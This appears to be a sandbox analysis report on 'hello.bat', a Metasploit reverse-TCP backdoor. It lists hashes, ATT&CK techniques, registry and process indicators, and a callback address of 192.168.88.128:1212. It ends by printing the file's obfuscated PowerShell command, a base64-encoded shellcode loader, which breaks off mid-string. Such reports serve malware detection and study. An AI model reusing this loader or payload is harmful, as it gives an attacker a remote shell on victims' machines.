metasploit | 924f3a216a642893777d5836fbe5042ad349a21376282e685900a4756ef7694b

Analysis

max time kernel
533s
max time network
536s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
30-04-2024 23:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

hello.bat
Size

7KB
MD5

2f13ee536d6ec5d8fbce76cf1bc40e92
SHA1

6fceee95abbc687a849cd24bd6614b5a67090acd
SHA256

924f3a216a642893777d5836fbe5042ad349a21376282e685900a4756ef7694b
SHA512

568e028eba41ae6c5b439897dfb5afbb14476b5b6fc88fb797446037bb83a81c547a788500a6b884d912af6b7dbd073cd480e560c9d07f46b0991c903d786e89
SSDEEP

192:XL5qvXhjyhwvWAUS+QDTE7uTbh3MiSyn0sX:XLcXhjyhGP+QDwaPh8iSpo

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

192.168.88.128:1212

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

31 mediafire.com
32 mediafire.com
33 mediafire.com

flow	ioc
31	mediafire.com
32	mediafire.com
33	mediafire.com

Drops file in Windows directory 2 IoCs

Processes:

taskmgr.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133589946063215630"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exetaskmgr.exe

pid	process
3808	powershell.exe
3808	powershell.exe
3808	powershell.exe
2304	powershell.exe
2304	powershell.exe
2304	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

3848 taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

chrome.exe

pid	process
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe
4212	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exetaskmgr.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	3808	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	3848	taskmgr.exe
Token: SeSystemProfilePrivilege	3848	taskmgr.exe
Token: SeCreateGlobalPrivilege	3848	taskmgr.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe
Token: SeShutdownPrivilege	4212	chrome.exe
Token: SeCreatePagefilePrivilege	4212	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe
3848	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exepowershell.exepowershell.execsc.exechrome.exe

description	pid	process	target process
PID 4472 wrote to memory of 3808	4472	cmd.exe	powershell.exe
PID 4472 wrote to memory of 3808	4472	cmd.exe	powershell.exe
PID 3808 wrote to memory of 2304	3808	powershell.exe	powershell.exe
PID 3808 wrote to memory of 2304	3808	powershell.exe	powershell.exe
PID 2304 wrote to memory of 4868	2304	powershell.exe	powershell.exe
PID 2304 wrote to memory of 4868	2304	powershell.exe	powershell.exe
PID 2304 wrote to memory of 4868	2304	powershell.exe	powershell.exe
PID 4868 wrote to memory of 3084	4868	powershell.exe	csc.exe
PID 4868 wrote to memory of 3084	4868	powershell.exe	csc.exe
PID 4868 wrote to memory of 3084	4868	powershell.exe	csc.exe
PID 3084 wrote to memory of 5092	3084	csc.exe	cvtres.exe
PID 3084 wrote to memory of 5092	3084	csc.exe	cvtres.exe
PID 3084 wrote to memory of 5092	3084	csc.exe	cvtres.exe
PID 4212 wrote to memory of 4744	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4744	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 200	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4556	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4556	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4936	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4936	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4936	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4936	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4936	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4936	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4936	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4936	4212	chrome.exe	chrome.exe
PID 4212 wrote to memory of 4936	4212	chrome.exe	chrome.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hello.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv lI -;sv mJz ec;sv qgU ((gv lI).value.toString()+(gv mJz).value.toString());powershell (gv qgU).value.toString() 'JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7A